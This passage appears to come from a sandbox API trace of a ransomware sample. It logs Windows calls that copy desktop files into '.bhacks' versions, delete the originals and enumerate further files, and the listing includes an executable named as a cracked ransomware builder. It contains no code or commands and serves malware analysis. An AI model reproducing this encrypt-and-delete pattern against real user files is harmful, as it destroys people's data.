lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.752] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.752] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.752] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.752] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.753] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.753] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.753] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.753] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.754] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.754] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.804] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.804] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.805] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.805] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.805] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.805] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.806] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.806] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.806] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x745, lpOverlapped=0x0) returned 1 [0064.806] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.806] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x0, lpOverlapped=0x0) returned 1 [0064.806] CloseHandle (hObject=0x33c) returned 1 [0064.807] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x6fea68, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6fea68*=0x750, lpOverlapped=0x0) returned 1 [0064.807] CloseHandle (hObject=0x324) returned 1 [0064.809] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\DN0hvZxxCeH-NYAF_H.png", nBufferLength=0x105, lpBuffer=0x6fe640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\DN0hvZxxCeH-NYAF_H.png", lpFilePart=0x0) returned 0x40 [0064.809] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\DN0hvZxxCeH-NYAF_H.png" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw\\dn0hvzxxceh-nyaf_h.png")) returned 1 [0064.850] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\iCkvEIW.png.bhacks", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\iCkvEIW.png.bhacks", lpFilePart=0x0) returned 0x3c [0064.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0064.850] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\iCkvEIW.png.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw\\ickveiw.png.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0064.851] GetFileType (hFile=0x324) returned 0x1 [0064.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0064.851] GetFileType (hFile=0x324) returned 0x1 [0064.951] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\iCkvEIW.png", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\iCkvEIW.png", lpFilePart=0x0) returned 0x35 [0064.951] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0064.951] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\iCkvEIW.png" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw\\ickveiw.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c [0064.951] GetFileType (hFile=0x33c) returned 0x1 [0064.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0064.951] GetFileType (hFile=0x33c) returned 0x1 [0064.951] ReadFile (in: hFile=0x33c, lpBuffer=0x25c6018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25c6018*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.951] ReadFile (in: hFile=0x33c, lpBuffer=0x25c6018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25c6018*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.951] WriteFile (in: hFile=0x324, lpBuffer=0x25c7230*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25c7230*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.953] ReadFile (in: hFile=0x33c, lpBuffer=0x25c6018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25c6018*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.953] WriteFile (in: hFile=0x324, lpBuffer=0x25c7230*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25c7230*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.953] ReadFile (in: hFile=0x33c, lpBuffer=0x25c6018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25c6018*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.953] WriteFile (in: hFile=0x324, lpBuffer=0x25c7230*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25c7230*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.953] ReadFile (in: hFile=0x33c, lpBuffer=0x25c6018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25c6018*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.954] WriteFile (in: hFile=0x324, lpBuffer=0x25c7230*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25c7230*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.954] ReadFile (in: hFile=0x33c, lpBuffer=0x25c6018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25c6018*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.954] WriteFile (in: hFile=0x324, lpBuffer=0x25c7230*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25c7230*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.954] ReadFile (in: hFile=0x33c, lpBuffer=0x25c6018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25c6018*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.954] WriteFile (in: hFile=0x324, lpBuffer=0x25c7230*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25c7230*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.955] ReadFile (in: hFile=0x33c, lpBuffer=0x25c6018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25c6018*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.955] WriteFile (in: hFile=0x324, lpBuffer=0x25c7230*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25c7230*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.976] ReadFile (in: hFile=0x33c, lpBuffer=0x24b15e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24b15e0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.976] WriteFile (in: hFile=0x324, lpBuffer=0x24b2610*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24b2610*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.976] ReadFile (in: hFile=0x33c, lpBuffer=0x24b15e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24b15e0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.976] WriteFile (in: hFile=0x324, lpBuffer=0x24b2610*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24b2610*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.977] ReadFile (in: hFile=0x33c, lpBuffer=0x24b15e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24b15e0*, lpNumberOfBytesRead=0x6feb68*=0x84f, lpOverlapped=0x0) returned 1 [0064.977] WriteFile (in: hFile=0x324, lpBuffer=0x24b2610*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24b2610*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.977] ReadFile (in: hFile=0x33c, lpBuffer=0x24b15e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24b15e0*, lpNumberOfBytesRead=0x6feb68*=0x0, lpOverlapped=0x0) returned 1 [0064.977] CloseHandle (hObject=0x33c) returned 1 [0064.977] WriteFile (in: hFile=0x324, lpBuffer=0x24b2610*, nNumberOfBytesToWrite=0x850, lpNumberOfBytesWritten=0x6fea68, lpOverlapped=0x0 | out: lpBuffer=0x24b2610*, lpNumberOfBytesWritten=0x6fea68*=0x850, lpOverlapped=0x0) returned 1 [0064.977] CloseHandle (hObject=0x324) returned 1 [0064.979] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\iCkvEIW.png", nBufferLength=0x105, lpBuffer=0x6fe640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\iCkvEIW.png", lpFilePart=0x0) returned 0x35 [0064.979] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\iCkvEIW.png" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw\\ickveiw.png")) returned 1 [0064.980] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0064.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0064.980] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0064.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0064.981] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0064.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0064.981] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0064.981] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.docx", lpFindFileData=0x6fe880 | out: lpFindFileData=0x6fe880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0064.981] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf140 [0064.981] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.981] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 1 [0064.981] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x0, dwReserved1=0x0, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 1 [0064.982] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 1 [0064.982] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x0, dwReserved1=0x0, cFileName="6yMUE.flv", cAlternateFileName="")) returned 1 [0064.982] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x0, dwReserved1=0x0, cFileName="7jATM.wav", cAlternateFileName="")) returned 1 [0064.982] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 1 [0064.982] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99d0b80, ftCreationTime.dwHighDateTime=0x1d5dff8, ftLastAccessTime.dwLowDateTime=0xf99d0b80, ftLastAccessTime.dwHighDateTime=0x1d5dff8, ftLastWriteTime.dwLowDateTime=0xf7d34800, ftLastWriteTime.dwHighDateTime=0x1d5dff8, nFileSizeHigh=0x0, nFileSizeLow=0xf0b23, dwReserved0=0x0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe", cAlternateFileName="ALIENR~1.EXE")) returned 1 [0064.982] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 1 [0064.983] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0064.983] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23825ba3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23825ba3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23b46f90, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4b80, dwReserved0=0x0, dwReserved1=0x0, cFileName="DqUNIlu.gif.bhacks", cAlternateFileName="DQUNIL~1.BHA")) returned 1 [0064.983] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x0, dwReserved1=0x0, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 1 [0064.983] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 1 [0064.983] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED 0nXQ VIkUvYr6", cAlternateFileName="ED0NXQ~1")) returned 1 [0064.983] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, 